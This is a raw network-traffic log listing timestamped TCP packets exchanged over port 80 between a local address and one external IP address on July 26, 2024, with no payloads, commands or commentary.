Jul 26, 2024 18:56:42.476270914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.476301908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.476620913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.476634026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.476648092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.476658106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.476677895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.476707935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.477705956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.477719069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.477729082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.477766991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.477798939 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.478739977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.478751898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.478763103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.478792906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.478825092 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.480544090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.480557919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.480567932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.480580091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.480634928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.480693102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.480705976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.480716944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.480751991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.480751991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.481738091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.481750011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.481760979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.481805086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.481837034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.485161066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.485191107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.485208988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.485220909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.485229969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.485245943 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.485276937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.492829084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.493026972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.493068933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.493081093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.493120909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.493796110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.493808031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.493818045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.493850946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.493881941 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.494699955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.494712114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.494723082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.494756937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.494787931 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.495728970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.495742083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.495753050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.495764971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.495771885 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.495807886 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.495809078 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.496584892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.496597052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.496608019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.496635914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.496666908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.497809887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.497823954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.497834921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.497870922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.497901917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.498477936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.498491049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.498501062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.498517990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.498548985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.498549938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.498581886 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.499771118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.499783039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.499793053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.499824047 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.499857903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.500487089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.500500917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.500511885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.500549078 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.500579119 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.501682043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.501694918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.501712084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.501724005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.501760960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.501760960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.501797915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.502271891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.502327919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.515569925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.515661955 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.515687943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.515700102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.515733004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.515764952 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.516277075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.516288042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.516297102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.516340971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.516371965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.517422915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.517433882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.517442942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.517491102 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.517522097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.518431902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.518445015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.518455982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.518467903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.518487930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.518488884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.518521070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.519306898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.519320011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.519330025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.519357920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.519396067 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.520275116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.520287991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.520339966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.520416975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.520473003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.521296978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.521311045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.521322012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.521334887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.521356106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.521392107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.521392107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.522176027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.522186995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.522197962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.522229910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.522229910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.522263050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.534657001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.534670115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.534679890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.534759045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.535104990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.535118103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.535171986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.535243034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.535254955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.535291910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.535337925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.535664082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.535676956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.535689116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.535717010 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.535748959 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.535938025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.535949945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.535962105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.535988092 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.536017895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.536432981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.536531925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.570369005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.570472956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.570485115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.570508957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.570548058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.570548058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.571038961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.571050882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.571062088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.571094036 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.571130037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.571638107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.571657896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.571669102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.571679115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.571688890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.571692944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.571705103 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.571707010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.571721077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.571731091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.571749926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.571770906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.572459936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.572473049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.572489977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.572514057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.572530985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.572537899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.573405981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.573417902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.573429108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.573446035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.573472023 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.574395895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.574409008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.574419022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.574429989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.574474096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.575328112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.575340986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.575351954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.575377941 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.575407982 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.576293945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.576307058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.576318026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.576349020 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.576361895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.577339888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.577353001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.577363014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.577375889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.577399969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.577426910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.578291893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.578341961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.597126007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.597206116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.597206116 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.597218990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.597253084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.597769976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.597784042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.597795010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.597827911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.597841024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.599112988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.599126101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.599137068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.599169016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.599198103 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.599958897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.599971056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.599981070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.599992990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.600008965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.600037098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.601377964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.601389885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.601401091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.601433992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.601445913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.601634026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.601645947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.601659060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.601689100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.601705074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.603377104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.603389978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.603399992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.603413105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.603427887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.603451967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.603523016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.603534937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.603543997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.603564978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.603584051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.604192019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.604206085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.604216099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.604243040 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.605007887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.605021000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.605031013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.605037928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.605045080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.605052948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.605082989 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.606863976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.606875896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.606885910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.606924057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.606934071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.606942892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.606946945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.606960058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.606975079 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.606992960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.607003927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.609606981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.609620094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.609632015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.609673977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.609690905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.609954119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.609998941 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.610232115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.610243082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.610253096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.610280991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.610306978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.611325026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.611336946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.611346006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.611370087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.611383915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.612087011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.612101078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.612111092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.612122059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.612149000 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.612168074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.612991095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.613003016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.613013983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.613065958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.613065958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.615238905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.615252972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.615263939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.615300894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.615300894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.615315914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.615315914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.615329981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.615343094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.615348101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.615370989 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.615390062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.615801096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.615813971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.615824938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.615844965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.615859985 CEST	49757	80	192.168.2.4	147.45.44.104
